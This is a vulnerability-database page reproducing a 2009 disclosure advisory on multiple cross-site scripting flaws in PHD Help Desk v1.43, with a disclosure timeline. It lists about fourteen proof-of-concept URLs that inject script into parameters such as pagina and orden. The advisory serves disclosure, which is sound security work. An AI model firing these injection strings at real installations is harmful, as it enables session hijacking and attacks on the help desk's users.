Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHD Help Desk v1.43 Mutliple XSS

🗓️ 16 Nov 2009 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 13 Views

PHD Help Desk v1.43 multiple vulnerabilities, Cross-site scripting in incident registry and follow up

Code

                                                ################################################################################
Mutliple XSS in PHD Help Desk v1.43

Name Multiple vulnerabilities in PHD Help Dsk
Systems Affected PHD Help Desk v1.43 and possibly earlier versions
Site http://www.p-hd.com.ar/
Author Amol Naik (amolnaik4[at]gmail.com)
Date 16/11/2009
################################################################################


############
1. OVERVIEW
############

PHD Help Desk is the software conceived for the registry and follow up of incidents in the Help Desk or Service Desk in your IT area of their company or organization.

###############
2. DESCRIPTION
###############

PHD Help Desk is vulnerable to Multiple cross-site scripting instances.

######################
3. TECHNICAL DETAILS
######################

Multiple Cross-site Scripting
++++++++++++++++++++++++++++++

Multiple pages found vulnerable to Cross-site Scripting mainly due to improper use of $_SERVER['PHP_SELF'] and lack of sanitization in user inputs.

++++
POC
++++

http://server/phd/area.php/'>alert("XSS")
http://server/phd/area.php?pagina='>alert("XSS")
http://server/phd/area.php?sentido='>alert("XSS")
http://server/phd/area.php?q_registros='>alert("XSS")
http://server/phd/area.php?orden='>alert("XSS")
http://server/phd/solic_display.php?pagina=1&q_registros=>alert("XSS")&orden=seq_solicitud_id
http://server/phd/area_list.php/'>alert("XSS")
http://server/phd/area_list.php?orden=nombre&sentido=&pagina=1&q_registros=0'>alert("XSS")
http://server/phd/atributo.php/'>alert("XSS")
http://server/phd/atributo_list.php?pagina=1'>alert("XSS")&q_registros=15&orden=activo&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15'>alert("XSS")&orden=activo&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo'>alert("XSS")&sentido=
http://server/phd/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido='>alert("XSS")
http://server/phd/caso_insert.php/'>alert("XSS")


Other pages may be vulnerable as well.


############
4. TimeLine
############

05/11/2009 Bug Discovered
05/11/2009 Reported to Vendor
05/11/2009 Vendor agrees to fix this in 2.00 version

Response from Vendor:
"I forgot to protect the $_GET entries, we are working in the 2.00 version and we will add this sugestion."

16/11/2009 Public Disclosure

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Nov 2009 00:00Current
7.1High risk
Vulners AI Score7.1
phd help deskv1.43multiple vulnerabilitiescross-site scriptingincident registry.
13